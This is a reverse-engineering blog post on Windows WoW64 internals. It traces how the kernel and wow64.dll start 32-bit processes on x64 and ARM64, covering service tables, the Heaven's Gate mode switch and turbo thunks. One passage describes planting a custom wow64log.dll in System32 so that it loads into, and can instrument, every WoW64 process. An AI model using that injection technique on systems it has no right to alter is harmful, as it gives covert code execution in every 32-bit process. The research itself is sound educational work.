WoW64 internals …re-discovering Heaven’s Gate on ARM

( Original text by PetrBenes )

WoW64 — aka Windows (32-bit) on Windows (64-bit) — is a subsystem that enables 32-bit Windows applications to run on 64-bit Windows. Most people today are familiar with WoW64 on Windows x64, where they can run x86 applications. WoW64 has been with us since Windows XP, and x64 wasn’t the only architecture where WoW64 has been available — it was available on IA-64architecture as well, where WoW64 has been responsible for emulating x86. Newly, WoW64 is also available on ARM64, enabling emulation of both x86 and ARM32 appllications.

MSDN offers brief article on WoW64 implementation details. We can find that WoW64 consists of (ignoring IA-64):

  • Translation support DLLs:
    • wow64.dll: translation of Nt* system calls (ntoskrnl.exe / ntdll.dll)
    • wow64win.dll: translation of NtGdi*NtUser* and other GUI-related system calls (win32k.sys / win32u.dll)
  • Emulation support DLLs:
    • wow64cpu.dll: support for running x86 programs on x64
    • wowarmhw.dll: support for running ARM32 programs on ARM64
    • xtajit.dll: support for running x86 programs on ARM64

Besides Nt* system call translation, the wow64.dll provides the core emulation infrastructure.

If you have previous experience with reversing WoW64 on x64, you can notice that it shares plenty of common code with WoW64 subsystem on ARM64. Especially if you peeked into WoW64 of recent x64 Windows, you may have noticed that it actually contains strings such as SysArm32 and that some functions check against IMAGE_FILE_MACHINE_ARMNT (0x1C4) machine type:

Wow64SelectSystem32PathInternal
Wow64SelectSystem32PathInternal found in wow64.dll on Windows x64
Wow64ArchGetSP
Wow64ArchGetSP found in wow64.dll on Windows x64

WoW on x64 systems cannot emulate ARM32 though — it just apparently shares common code. But SysX8664 and SysArm64 sound particularly interesting!

Those similarities can help anyone who is fluent in x86/x64, but not that much in ARM. Also, HexRays decompiler produce much better output for x86/x64 than for ARM32/ARM64.

Initially, my purpose with this blogpost was to get you familiar with how WoW64 works for ARM32 programs on ARM64. But because WoW64 itself changed a lot with Windows 10, and because WoW64 shares some similarities between x64 and ARM64, I decided to briefly get you through how WoW64 works in general.

Everything presented in this article is based on Windows 10 — insider preview, build 18247.

Terms

Througout this article I’ll be using some terms I’d like to explain beforehand:

  • ntdll or ntdll.dll — these will be always refering to the native ntdll.dll (x64 on Windows x64, ARM64 on Windows ARM64, …), until said otherwise or until the context wouldn’t indicate otherwise.
  • ntdll32 or ntdll32.dll — to make an easy distinction between native and WoW64 ntdll.dllany WoW64 ntdll.dll will be refered with the *32 suffix.
  • emu or emu.dll — these will represent any of the emulation support DLLs (one of wow64cpu.dll,wowarmhw.dllxtajit.dll)
  • module!FunctionName — refers to a symbol FunctionName within the module. If you’re familiar with WinDbg, you’re already familiar with this notation.
  • CHPE — “compiled-hybrid-PE”, a new type of PE file, which looks as if it was x86 PE file, but has ARM64 code within them. CHPE will be tackled in more detail in the x86 on ARM64 section.
  • The terms emulation and binary-translation refer to the WoW64 workings and they may be used interchangeably.

Kernel

This section shows some points of interest in the ntoskrnl.exe regarding to the WoW64 initialization. If you’re interested only in the user-mode part of the WoW64, you can skip this part to the Initialization of the WoW64 process.

Kernel (initialization)

Initalization of WoW64 begins with the initialization of the kernel:

  • nt!KiSystemStartup
  • nt!KiInitializeKernel
  • nt!InitBootProcessor
  • nt!PspInitPhase0
  • nt!Phase1Initialization
    • nt!IoInitSystem
      • nt!IoInitSystemPreDrivers
      • nt!PsLocateSystemDlls

nt!PsLocateSystemDlls routine takes a pointer named nt!PspSystemDlls, and then calls nt!PspLocateSystemDll in a loop. Let’s figure out what’s going on here:

PspSystemDlls (x64)
PspSystemDlls (x64)
PspSystemDlls (ARM64)
PspSystemDlls (ARM64)

nt!PspSystemDlls appears to be array of pointers to some structure, which holds some NTDLL-related data. The order of these NTDLLs corresponds with this enum (included in the PDB):

typedef enum _SYSTEM_DLL_TYPE
{
PsNativeSystemDll = 0,
PsWowX86SystemDll = 1,
PsWowArm32SystemDll = 2,
PsWowAmd64SystemDll = 3,
PsWowChpeX86SystemDll = 4,
PsVsmEnclaveRuntimeDll = 5,
PsSystemDllTotalTypes = 6,
} SYSTEM_DLL_TYPE;
view rawSYSTEM_DLL_TYPE.h hosted with ❤ by GitHub

Remember this enum, we’ll be needing it again in a while.

Now, let’s look how such structure looks like:

SystemDllData (x64)
SystemDllData (x64)
SystemDllData (ARM64)
SystemDllData (ARM64)

The nt!PspLocateSystemDll function intializes fields of this structure. The layout of this structure isn’t unfortunatelly in the PDB, but you can find a reconstructed version in the appendix.

Now let’s get back to the nt!Phase1Initialization — there’s more:

  • ...
  • nt!Phase1Initialization
    • nt!Phase1InitializationIoReady
      • nt!PspInitPhase2
      • nt!PspInitializeSystemDlls

nt!PspInitializeSystemDlls routine takes a pointer named nt!NtdllExportInformation. Let’s look at it:

NtdllExportInformation (x64)
NtdllExportInformation (x64)
NtdllExportInformation (ARM64)
NtdllExportInformation (ARM64)

It looks like it’s some sort of array, again, ordered by the enum _SYSTEM_DLL_TYPE mentioned earlier. Let’s examine NtdllExports:

NtdllExportInformation (x64)
NtdllExportInformation (x64)

Nothing unexpected — just tuples of function name and function pointer. Did you notice the difference in the number after the NtdllExports field? On x64 there is 19 meanwhile on ARM64 there is 14. This number represents number of items in NtdllExports — and indeed, there is slightly different set of them:

x64 ARM64
(0) LdrInitializeThunk (0) LdrInitializeThunk
(1) RtlUserThreadStart (1) RtlUserThreadStart
(2) KiUserExceptionDispatcher (2) KiUserExceptionDispatcher
(3) KiUserApcDispatcher (3) KiUserApcDispatcher
(4) KiUserCallbackDispatcher (4) KiUserCallbackDispatcher
(5) KiUserCallbackDispatcherReturn
(5) KiRaiseUserExceptionDispatcher (6) KiRaiseUserExceptionDispatcher
(6) RtlpExecuteUmsThread
(7) RtlpUmsThreadYield
(8) RtlpUmsExecuteYieldThreadEnd
(9) ExpInterlockedPopEntrySListEnd (7) ExpInterlockedPopEntrySListEnd
(10) ExpInterlockedPopEntrySListFault (8) ExpInterlockedPopEntrySListFault
(11) ExpInterlockedPopEntrySListResume (9) ExpInterlockedPopEntrySListResume
(12) LdrSystemDllInitBlock (10) LdrSystemDllInitBlock
(13) RtlpFreezeTimeBias (11) RtlpFreezeTimeBias
(14) KiUserInvertedFunctionTable (12) KiUserInvertedFunctionTable
(15) WerReportExceptionWorker (13) WerReportExceptionWorker
(16) RtlCallEnclaveReturn
(17) RtlEnclaveCallDispatch
(18) RtlEnclaveCallDispatchReturn

We can see that ARM64 is missing Ums (User-Mode Scheduling) and Enclave functions. Also, we can see that ARM64 has one extra function: KiUserCallbackDispatcherReturn.

On the other hand, all NtdllWow*Exports contain the same set of function names:

NtdllWowExports (ARM64)
NtdllWowExports (ARM64)

Notice names of second fields of these “structures”: PsWowX86SharedInformation,PsWowChpeX86SharedInformation, … If we look at the address of those fields, we can see that they’re part of another array:

PsWowX86SharedInformation (ARM64)
PsWowX86SharedInformation (ARM64)

Those addresses are actually targets of the pointers in the NtdllWow*Exports structure. Also, those functions combined with PsWow*SharedInformation might give you hint that they’re related to this enum (included in the PDB):

typedef enum _WOW64_SHARED_INFORMATION
{
SharedNtdll32LdrInitializeThunk = 0,
SharedNtdll32KiUserExceptionDispatcher = 1,
SharedNtdll32KiUserApcDispatcher = 2,
SharedNtdll32KiUserCallbackDispatcher = 3,
SharedNtdll32RtlUserThreadStart = 4,
SharedNtdll32pQueryProcessDebugInformationRemote = 5,
SharedNtdll32BaseAddress = 6,
SharedNtdll32LdrSystemDllInitBlock = 7,
SharedNtdll32RtlpFreezeTimeBias = 8,
Wow64SharedPageEntriesCount = 9,
} WOW64_SHARED_INFORMATION;

Notice how the order of the SharedNtdll32BaseAddress corellates with the empty field in the previous screenshot (highlighted). The set of WoW64 NTDLL functions is same on both x64 and ARM64.

(The C representation of this data can be found in the appendix.)

Now we can tell what the nt!PspInitializeSystemDlls function does — it gets image base of each NTDLL (nt!PsQuerySystemDllInfo), resolves all Ntdll*Exports for them (nt!RtlFindExportedRoutineByName). Also, only for all WoW64 NTDLLs (if ((SYSTEM_DLL_TYPE)SystemDllType > PsNativeSystemDll)) it assigns the image base to the SharedNtdll32BaseAddress field of the PsWow*SharedInformation array (nt!PspWow64GetSharedInformation).

Kernel (create process)

Let’s talk briefly about process creation. As you probably already know, the native ntdll.dll is mapped as a first DLL into each created process. This applies for all architectures — x86x64 and also for ARM64. The WoW64 processes aren’t exception to this rule — the WoW64 processes share the same initialization code path as native processes.

  • nt!NtCreateUserProcess
  • nt!PspAllocateProcess
    • nt!PspSetupUserProcessAddressSpace
      • nt!PspPrepareSystemDllInitBlock
      • nt!PspWow64SetupUserProcessAddressSpace
  • nt!PspAllocateThread
    • nt!PspWow64InitThread
    • nt!KeInitThread // Entry-point: nt!PspUserThreadStartup
  • nt!PspUserThreadStartup
  • nt!PspInitializeThunkContext
    • nt!KiDispatchException

If you ever wondered how is the first user-mode instruction of the newly created process executed, now you know the answer — a “synthetic” user-mode exception is dispatched, with ExceptionRecord.ExceptionAddress = &PspLoaderInitRoutine, where PspLoaderInitRoutinepoints to the ntdll!LdrInitializeThunk. This is the first function that is executed in every process — including WoW64 processes.

Initialization of the WoW64 process

The fun part begins!

NOTE: Initialization of the wow64.dll is same on both x64 and ARM64. Eventual differences will be mentioned.

  • ntdll!LdrInitializeThunk
  • ntdll!LdrpInitialize
  • ntdll!_LdrpInitialize
  • ntdll!LdrpInitializeProcess
  • ntdll!LdrpLoadWow64

The ntdll!LdrpLoadWow64 function is called when the ntdll!UseWOW64 global variable is TRUE, which is set when NtCurrentTeb()->WowTebOffset != NULL.

It constructs the full path to the wow64.dll, loads it, and then resolves following functions:

  • Wow64LdrpInitialize
  • Wow64PrepareForException
  • Wow64ApcRoutine
  • Wow64PrepareForDebuggerAttach
  • Wow64SuspendLocalThread

NOTE: The resolution of these pointers is wrapped between pair of ntdll!LdrProtectMrdata calls, responsible for protecting (1) and unprotecting (0) the .mrdata section — in which these pointers reside. MRDATA (Mutable Read Only Data) are part of the CFG (Control-Flow Guard) functionality. You can look at Alex’s slides for more information.

When these functions are successfully located, the ntdll.dll finally transfers control to the wow64.dll by calling wow64!Wow64LdrpInitialize. Let’s go through the sequence of calls that eventually bring us to the entry-point of the “emulated” application.

  • wow64!Wow64LdrpInitialize
    • wow64!Wow64InfoPtr = (NtCurrentPeb32() + 1)
    • NtCurrentTeb()->TlsSlots[/* 10 */ WOW64_TLS_WOW64INFO] = wow64!Wow64InfoPtr
    • ntdll!RtlWow64GetCpuAreaInfo
    • wow64!ProcessInit
    • wow64!CpuNotifyMapViewOfSection // Process image
    • wow64!Wow64DetectMachineTypeInternal
    • wow64!Wow64SelectSystem32PathInternal
    • wow64!CpuNotifyMapViewOfSection // 32-bit NTDLL image
    • wow64!ThreadInit
    • wow64!ThunkStartupContext64TO32
    • wow64!Wow64SetupInitialCall
    • wow64!RunCpuSimulation
      • emu!BTCpuSimulate

Wow64InfoPtr is the first initialized variable in the wow64.dll. It contains data shared between 32-bit and 64-bit execution mode and its structure is not documented, although you can find this structure partialy restored in the appendix.

RtlWow64GetCpuAreaInfo is an internal ntdll.dll function which is called a lot during emulation. It is mainly used for fetching the machine type and architecture-specific CPU context (the CONTEXTstructure) of the emulated process. This information is fetched into an undocumented structure, which we’ll be calling WOW64_CPU_AREA_INFO. Pointer to this structure is then given to the ProcessInit function.

Wow64DetectMachineTypeInternal determines the machine type of the executed process and returns it. Wow64SelectSystem32PathInternal selects the “emulated” System32 directory based on that machine type, e.g. SysWOW64 for x86 processes or SysArm32 for ARM32 processes.

You can also notice calls to CpuNotifyMapViewOfSection function. As the name suggests, it is also called on each “emulated” call of NtMapViewOfSection. This function:

  • Checks if the mapped image is executable
  • Checks if following conditions are true:
    • NtHeaders->OptionalHeader.MajorSubsystemVersion == USER_SHARED_DATA.NtMajorVersion
    • NtHeaders->OptionalHeader.MinorSubsystemVersion == USER_SHARED_DATA.NtMinorVersion

If these checks pass, CpupResolveReverseImports function is called. This function checks if the mapped image exports the Wow64Transition symbol and if so, it assigns there a 32-bit pointer value returned by emu!BTCpuGetBopCode.

The Wow64Transition is mostly known to be exported by SysWOW64\ntdll.dll, but there are actually multiple of Windows’ WoW DLLs which exports this symbol (will be mentioned later). You might be already familiar with the term “Heaven’s Gate” — this is where the Wow64Transition will point to on Windows x64 — a simple far jump instruction which switches into long-mode (64-bit) enabled code segment. On ARM64, the Wow64Transition points to a “nop” function.

NOTE: Because there are no checks on the ImageName, the Wow64Transition symbol is resolved for all executable images that passes the checks mentioned earlier. If you’re wondering whether Wow64Transition would be resolved for your custom executable or DLL — it indeed would!

The initialization then continues with thread-specific initialization by calling ThreadInit. This is followed by pair of calls ThunkStartupContext64TO32(CpuArea.MachineType, CpuArea.Context, NativeContext) and Wow64SetupInitialCall(&CpuArea) — these functions perform the necessary setup of the architecture-specific WoW64 CONTEXT structure to prepare start of the execution in the emulated environment. This is done in the exact same way as if ntoskrnl.exe would actually executed the emulated application — i.e.:

  • setting the instruction pointer to the address of ntdll32!LdrInitializeThunk
  • setting the stack pointer below the WoW64 CONTEXT structure
  • setting the 1st parameter to point to that CONTEXT structure
  • setting the 2nd parameter to point to the base address of the ntdll32

Finally, the RunCpuSimulation function is called. This function just calls BTCpuSimulate from the binary-translator DLL, which contains the actual emulation loop that never returns.

wow64!ProcessInit

  • wow64!Wow64ProtectMrdata // 0
  • wow64!Wow64pLoadLogDll
    • ntdll!LdrLoadDll // "%SystemRoot%\system32\wow64log.dll"

wow64.dll has also it’s own .mrdata section and ProcessInit begins with unprotecting it. It then tries to load the wow64log.dll from the constructed system directory. Note that this DLL is never present in any released Windows installation (it’s probably used internally by Microsoft for debugging of the WoW64 subsystem). Therefore, load of this DLL will normally fail. This isn’t problem, though, because no critical functionality of the WoW64 subsystem depends on it. If the load would actually succeed, the wow64.dll would try to find following exported functions there:

  • Wow64LogInitialize
  • Wow64LogSystemService
  • Wow64LogMessageArgList
  • Wow64LogTerminate

If any of these functions wouldn’t be exported, the DLL would be immediately unloaded.

If we’d drop custom wow64log.dll (which would export functions mentioned above) into the %SystemRoot%\System32 directory, it would actually get loaded into every WoW64 process. This way we could drop a custom logging DLL, or even inject every WoW64 process with native DLL!

For more details, you can check my injdrv project which implements injection of native DLLs into WoW64 processes, or check this post by Walied Assar.

Then, certain important values are fetched from the LdrSystemDllInitBlock array. These contains base address of the ntdll32.dll, pointer to functions like ntdll32!KiUserExceptionDispatcherntdll32!KiUserApcDispatcher, …, control flow guard information and others.

Finally, the Wow64pInitializeFilePathRedirection is called, which — as the name suggests — initializes WoW64 path redirection. The path redirection is completely implemented in the wow64.dll and the mechanism is basically based on string replacement. The path redirection can be disabled and enabled by calling kernel32!Wow64DisableWow64FsRedirection & kernel32!Wow64RevertWow64FsRedirection function pairs. Both of these functions internally call ntdll32!RtlWow64EnableFsRedirectionEx, which directly operates on NtCurrentTeb()->TlsSlots[/* 8 */ WOW64_TLS_FILESYSREDIR] field.

wow64!ServiceTables

Next, a ServiceTables array is initialized. You might be already familiar with the KSERVICE_TABLE_DESCRIPTOR from the ntoskrnl.exe, which contains — among other things — a pointer to an array of system functions callable from the user-mode. ntoskrnl.exe contains 2 of these tables: one for ntoskrnl.exe itself and one for the win32k.sys, aka the Windows (GUI) subsystem. wow64.dll has 4 of them!

The WOW64_SERVICE_TABLE_DESCRIPTOR has the exact same structure as the KSERVICE_TABLE_DESCRIPTOR, except that it is extended:

typedef struct _WOW64_ERROR_CASE {
ULONG Case;
NTSTATUS TransformedStatus;
} WOW64_ERROR_CASE, *PWOW64_ERROR_CASE;
typedef struct _WOW64_SERVICE_TABLE_DESCRIPTOR {
KSERVICE_TABLE_DESCRIPTOR Descriptor;
WOW64_ERROR_CASE ErrorCaseDefault;
PWOW64_ERROR_CASE ErrorCase;
} WOW64_SERVICE_TABLE_DESCRIPTOR, *PWOW64_SERVICE_TABLE_DESCRIPTOR;

(More detailed definition of this structure is in the appendix.)

ServiceTables array is populated as follows:

  • ServiceTables[/* 0 */ WOW64_NTDLL_SERVICE_INDEX] = sdwhnt32
  • ServiceTables[/* 1 */ WOW64_WIN32U_SERVICE_INDEX] = wow64win!sdwhwin32
  • ServiceTables[/* 2 */ WOW64_KERNEL32_SERVICE_INDEX = wow64win!sdwhcon
  • ServiceTables[/* 3 */ WOW64_USER32_SERVICE_INDEX] = sdwhbase

NOTE: wow64.dll directly depends (by import table) on two DLLs: the native ntdll.dll and wow64win.dll. This means that wow64win.dll is loaded even into “non-Windows-subsystem” processes, that wouldn’t normally load user32.dll.

These two symbols mentioned above are the only symbols that wow64.dll requires wow64win.dll to export.

Let’s have a look at sdwhnt32 service table:

sdwhnt32 (x64)
sdwhnt32 (x64)
sdwhnt32JumpTable (x64)
sdwhnt32JumpTable (x64)
sdwhnt32Number (x64)
sdwhnt32Number (x64)

There is nothing surprising for those who already dealt with service tables in ntoskrnl.exe.sdwhnt32JumpTable contains array of the system call functions, which are traditionaly prefixed. WoW64 “system calls” are prefixed with wh*, which honestly I don’t have any idea what it stands for — although it might be the case as with Zw* prefix — it stands for nothing and is simply used as an unique distinguisher.

The job of these wh* functions is to correctly convert any arguments and return values from the 32-bit version to the native, 64-bit version. Keep in mind that that it not only includes conversion of integers and pointers, but also content of the structures. Interesting note might be that each of the wh* functions has only one argument, which is pointer to an array of 32-bit values. This array contains the parameters passed to the 32-bit system call.

As you could notice, in those 4 service tables there are “system calls” that are not present in the ntoskrnl.exe. Also, I mentioned earlier that the Wow64Transition is resolved in multiple DLLs. Currently, these DLLs export this symbol:

  • ntdll.dll
  • win32u.dll
  • kernel32.dll and kernelbase.dll
  • user32.dll

The ntdll.dll and win32u.dll are obvious and they represent the same thing as their native counterparts. The service tables used by kernel32.dll and user32.dll contain functions for transformation of particular csrss.exe calls into their 64-bit version.

It’s also worth noting that at the end of the ntdll.dll system table, there are several functions with NtWow64* calls, such as NtWow64ReadVirtualMemory64NtWow64WriteVirtualMemory64 and others. These are special functions which are provided only to WoW64 processes.

One of these special functions is also NtWow64CallFunction64. It has it’s own small dispatch table and callers can select which function should be called based on its index:

Wow64FunctionDispatch64 (x64)
Wow64FunctionDispatch64 (x64)

NOTE: I’ll be talking about one of these functions — namely Wow64CallFunctionTurboThunkControl — later in the Disabling Turbo thunks section.

wow64!Wow64SystemServiceEx

This function is similar to the kernel’s nt!KiSystemCall64 — it does the dispatching of the system call. This function is exported by the wow64.dll and imported by the emulation DLLs. Wow64SystemServiceEx accepts 2 arguments:

  • The system call number
  • Pointer to an array of 32-bit arguments passed to the system call (as mentioned earlier)

The system call number isn’t just an index, but also contains index of a system table which needs to be selected (this is also true for ntoskrnl.exe):

typedef struct _WOW64_SYSTEM_SERVICE
{
USHORT SystemCallNumber : 12;
USHORT ServiceTableIndex : 4;
} WOW64_SYSTEM_SERVICE, *PWOW64_SYSTEM_SERVICE;

This function then selects ServiceTables[ServiceTableIndex] and calls the appropriate wh*function based on the SystemCallNumber.

Wow64SystemServiceEx (x64)
Wow64SystemServiceEx (x64)

NOTE: In case the wow64log.dll has been successfully loaded, the Wow64SystemServiceEx function calls Wow64LogSystemServiceWrapper (wrapper around wow64log!Wow64LogSystemService function): once before the actual system call and one immediately after. This can be used for instrumentation of each WoW64 system call! The structure passed to Wow64LogSystemService contains every important information about the system call — it’s table index, system call number, the argument list and on the second call, even the resulting NTSTATUS! You can find layout of this structure in the appendix(WOW64_LOG_SERVICE).

Finally, as have been mentioned, the WOW64_SERVICE_TABLE_DESCRIPTOR structure differs from KSERVICE_TABLE_DESCRIPTOR in that it contains ErrorCase table. The code mentioned above is actually wrapped in a SEH __try/__except block. If whService raise an exception, the __exceptblock calls Wow64HandleSystemServiceError function. The function looks if the corresponding service table which raised the exception has non-NULL ErrorCase and if it does, it selects the appropriate WOW64_ERROR_CASE for the system call. If the ErrorCase is NULL, the values from ErrorCaseDefault are used. The NTSTATUS of the exception is then transformed according to an algorithm which can be found in the appendix.

wow64!ProcessInit (cont.)

  • ...
  • wow64!CpuLoadBinaryTranslator // MachineType
    • wow64!CpuGetBinaryTranslatorPath // MachineType
      • ntdll!NtOpenKey // "\Registry\Machine\Software\Microsoft\Wow64\"
      • ntdll!NtQueryValueKey // "arm" / "x86"
      • ntdll!RtlGetNtSystemRoot // "arm" / "x86"
      • ntdll!RtlUnicodeStringPrintf // "%ws\system32\%ws"

As you’ve probably guessed, this function constructs path to the binary-translator DLL, which is — on x64 — known as wow64cpu.dll. This DLL will be responsible for the actual low-level emulation.

\Registry\Machine\Software\Microsoft\Wow64\x86 (x64)
\Registry\Machine\Software\Microsoft\Wow64\x86 (x64)
\Registry\Machine\Software\Microsoft\Wow64\arm (ARM64)
\Registry\Machine\Software\Microsoft\Wow64\arm (ARM64)
\Registry\Machine\Software\Microsoft\Wow64\x86 (ARM64)
\Registry\Machine\Software\Microsoft\Wow64\x86 (ARM64)

We can see that there is no wow64cpu.dll on ARM64. Instead, there is xtajit.dll used for x86 emulation and wowarmhw.dll used for ARM32 emulation.

NOTE: The CpuGetBinaryTranslatorPath function is same on both x64 and ARM64 except for one peculiar difference: on Windows x64, if the \Registry\Machine\Software\Microsoft\Wow64\x86 key cannot be opened (is missing/was deleted), the function contains a fallback to load wow64cpu.dll. On Windows ARM64, though, it doesn’t have such fallback and if the registry key is missing, the function fails and the WoW64 process is terminated.

wow64.dll then loads one of the selected DLL and tries to find there following exported functions:

BTCpuProcessInit (!) BTCpuProcessTerm
BTCpuThreadInit BTCpuThreadTerm
BTCpuSimulate (!) BTCpuResetFloatingPoint
BTCpuResetToConsistentState BTCpuNotifyDllLoad
BTCpuNotifyDllUnload BTCpuPrepareForDebuggerAttach
BTCpuNotifyBeforeFork BTCpuNotifyAfterFork
BTCpuNotifyAffinityChange BTCpuSuspendLocalThread
BTCpuIsProcessorFeaturePresent BTCpuGetBopCode (!)
BTCpuGetContext BTCpuSetContext
BTCpuTurboThunkControl BTCpuNotifyMemoryAlloc
BTCpuNotifyMemoryFree BTCpuNotifyMemoryProtect
BTCpuFlushInstructionCache2 BTCpuNotifyMapViewOfSection
BTCpuNotifyUnmapViewOfSection BTCpuUpdateProcessorInformation
BTCpuNotifyReadFile BTCpuCfgDispatchControl
BTCpuUseChpeFile BTCpuOptimizeChpeImportThunks
BTCpuNotifyProcessExecuteFlagsChange BTCpuProcessDebugEvent
BTCpuFlushInstructionCacheHeavy

Interestingly, not all functions need to be found — only those marked with the “(!)”, the rest is optional. As a next step, the resolved BTCpuProcessInit function is called, which performs binary-translator-specific process initialization. We’ll cover that in later section.

At the end of the ProcessInit function, wow64!Wow64ProtectMrdata(1) is called, making .mrdatanon-writable again.

wow64!ThreadInit

  • wow64!ThreadInit
    • wow64!CpuThreadInit
      • NtCurrentTeb32()->WOW32Reserved = BTCpuGetBopCode()
      • emu!BTCpuThreadInit

ThreadInit does some little thread-specific initialization, such as:

  • Copying CurrentLocale and IdealProcessor values from 64-bit TEB into 32-bit TEB.
  • For non-WOW64_CPUFLAGS_SOFTWARE emulators, it calls CpuThreadInit, which:
    • Performs NtCurrentTeb32()->WOW32Reserved = BTCpuGetBopCode().
    • Calls emu!BTCpuThreadInit().
  • For WOW64_CPUFLAGS_SOFTWARE emulators, it creates an event, which added intoAlertByThreadIdEventHashTable and set to NtCurrentTeb()->TlsSlots[18]. This event is used for special emulation of NtAlertThreadByThreadId and NtWaitForAlertByThreadId.

NOTE: The WOW64_CPUFLAGS_MSFT64 (1) or the WOW64_CPUFLAGS_SOFTWARE (2) flag is stored in the NtCurrentTeb()->TlsSlots[/* 10 */ WOW64_TLS_WOW64INFO], in the WOW64INFO.CpuFlags field. One of these flags is always set in the emulator’s BTCpuProcessInit function (mentioned in the section above):

  • wow64cpu.dll sets WOW64_CPUFLAGS_MSFT64 (1)
  • wowarmhw.dll sets WOW64_CPUFLAGS_MSFT64 (1)
  • xtajit.dll sets WOW64_CPUFLAGS_SOFTWARE (2)

x86 on x64

Entering 32-bit mode

  • ...
  • wow64!RunCpuSimulation
    • wow64cpu!BTCpuSimulate
      • wow64cpu!RunSimulatedCode

RunSimulatedCode runs in a loop and performs transitions into 32-bit mode either via:

  • jmp fword ptr[reg] — a “far jump” that not only changes instruction pointer (RIP), but also the code segment register (CS). This segment usually being set to 0x23, while 64-bit code segment is 0x33
  • synthetic “machine frame” and iret — called on every “state reset”

NOTE: Explanation of segmentation and “why does it work just by changing a segment register” is beyond scope of this article. If you’d like to know more about “long mode” and segmentation, you can start here.

Far jump is used most of the time for the transition, mainly because it’s faster. iret on the other hand is more powerful, as it can change CSSSEFLAGSRSP and RIP all at once. The “state reset” occurs when WOW64_CPURESERVED.Flags has WOW64_CPURESERVED_FLAG_RESET_STATE (1) bit set. This happens during exception (see wow64!Wow64PrepareForException and wow64cpu!BTCpuResetToConsistentState). Also, this flag is cleared on every emulation loop (using btr — bit-test-and-reset).

Start of the RunSimulatedCode (x64)
Start of the RunSimulatedCode (x64)

You can see the simplest form of switching into the 32-bit mode. Also, at the beginning you can see that TurboThunkDispatch address is moved into the r15 register. This register stays untouched during the whole RunSimulatedCode function. Turbo thunks will be explained in more detail later.

Leaving 32-bit mode

The switch back to the 64-bit mode is very similar — it also uses far jumps. The usual situation when code wants to switch back to the 64-bit mode is upon system call:

NtMapViewOfSection (x64)
NtMapViewOfSection (x64)

The Wow64SystemServiceCall is just a simple jump to the Wow64Transition:

Wow64SystemServiceCall (x64)
Wow64SystemServiceCall (x64)

If you remember, the Wow64Transition value is resolved by the wow64cpu!BTCpuGetBopCodefunction:

BTCpuGetBopCode - wow64cpu.dll (x64)
BTCpuGetBopCode — wow64cpu.dll (x64)

It selects either KiFastSystemCall or KiFastSystemCall2 based on the CpupSystemCallFast value.

The KiFastSystemCall looks like this (used when CpupSystemCallFast != 0):

  • [x86] jmp 33h:$+9 (jumps to the instruction below)
  • [x64] jmp qword ptr [r15+offset] (which points to CpupReturnFromSimulatedCode)

The KiFastSystemCall2 looks like this (used when CpupSystemCallFast == 0):

  • [x86] push 0x33
  • [x86] push eax
  • [x86] call $+5
  • [x86] pop eax
  • [x86] add eax, 12
  • [x86] xchg eax, dword ptr [esp]
  • [x86] jmp fword ptr [esp] (jumps to the instruction below)
  • [x64] add rsp, 8
  • [x64] jmp wow64cpu!CpupReturnFromSimulatedCode

Clearly, the KiFastSystemCall is faster, so why it’s not used used every time?

It turns out, CpupSystemCallFast is set to 1 in the wow64cpu!BTCpuProcessInit function if the process is not executed with the ProhibitDynamicCode mitigation policy and if NtProtectVirtualMemory(&KiFastSystemCall, PAGE_READ_EXECUTE) succeeds.

This is because KiFastSystemCall is in a non-executable read-only section (W64SVC) whileKiFastSystemCall2 is in read-executable section (WOW64SVC).

But the actual reason why is KiFastSystemCall in non-executable section by default and needs to be set as executable manually is, honestly, unknown to me. My guess would be that it has something to do with relocations, because the address in the jmp 33h:$+9 instruction must be somehow resolved by the loader. But maybe I’m wrong. Let me know if you know the answer!

Turbo thunks

I hope you didn’t forget about the TurboThunkDispatch address hanging in the r15 register. This value is used as a jump-table:

TurboThunkDispatch (x64)
TurboThunkDispatch (x64)

There are 32 items in the jump-table.

TurboDispatchJumpAddressStart (x64)
TurboDispatchJumpAddressStart (x64)

CpupReturnFromSimulatedCode is the first code that is always executed in the 64-bit mode when 32-bit to 64-bit transition occurs. Let’s recapitulate the code:

  • Stack is swapped,
  • Non-volatile registers are saved
  • eax — which contains the encoded service table index and system call number — is moved into the ecx
  • it’s high-word is acquired via ecx >> 16.
  • the result is used as an index into the TurboThunkDispatch jump-table

You might be confused now, because few sections above we’ve defined the service number like this:

typedef struct _WOW64_SYSTEM_SERVICE
{
USHORT SystemCallNumber : 12;
USHORT ServiceTableIndex : 4;
} WOW64_SYSTEM_SERVICE, *PWOW64_SYSTEM_SERVICE;

…therefore, after right-shifting this value by 16 bits we should get always 0, right?

It turns out, on x64, the WOW64_SYSTEM_SERVICE might be defined like this:

typedef struct _WOW64_SYSTEM_SERVICE
{
ULONG SystemCallNumber : 12;
ULONG ServiceTableIndex : 4;
ULONG TurboThunkNumber : 5; // Can hold values 0 — 31
ULONG AlwaysZero : 11;
} WOW64_SYSTEM_SERVICE, *PWOW64_SYSTEM_SERVICE;

Let’s examine few WoW64 system calls:

NtMapViewOfSection (x64)
NtMapViewOfSection (x64)
NtWaitForSingleObject (x64)
NtWaitForSingleObject (x64)
NtDeviceIoControlFile (x64)
NtDeviceIoControlFile (x64)

Based on our new definition of WOW64_SYSTEM_SERVICE, we can conclude that:

  • NtMapViewOfSection uses turbo thunk with index 0 (TurboDispatchJumpAddressEnd)
  • NtWaitForSingleObject uses turbo thunk with index 13 (Thunk3ArgSpNSpNSpReloadState)
  • NtDeviceIoControlFile uses turbo thunk with index 27 (DeviceIoctlFile)

Let’s finally explain “turbo thunks” in proper way.

Turbo thunks are an optimalization of WoW64 subsystem — specifically on Windows x64 — that enables for particular system calls to never leave the wow64cpu.dll — the conversion of parameters and return value, and the syscall instruction itself is fully performed there. The set of functions that use these turbo thunks reveals, that they are usually very simple in terms of parameter conversion — they receive numerical values or handles.

The notation of Thunk* labels is as follows:

  • The number specifies how many arguments the function receives
  • Sp converts parameter with sign-extension
  • NSp converts parameter without sign-extension
  • ReloadState will return to the 32-bit mode using iret instead of far jump, if WOW64_CPURESERVED_FLAG_RESET_STATE is set
  • QuerySystemTimeReadWriteFileDeviceIoctlFile, … are special cases

Let’s take the NtWaitForSingleObject and its turbo thunk Thunk3ArgSpNSpNSpReloadState as an example:

  • it receives 3 parameters
  • 1st parameter is sign-extended
  • 2nd parameter isn’t sign-extended
  • 3rd parameter isn’t sign-extended
  • it can switch to 32-bit mode using iret if WOW64_CPURESERVED_FLAG_RESET_STATE is set

When we cross-check this information with its function prototype, it makes sense:

NTSTATUS
NTAPI
NtWaitForSingleObject(
_In_ HANDLE Handle,
_In_ BOOLEAN Alertable,
_In_ PLARGE_INTEGER Timeout
);

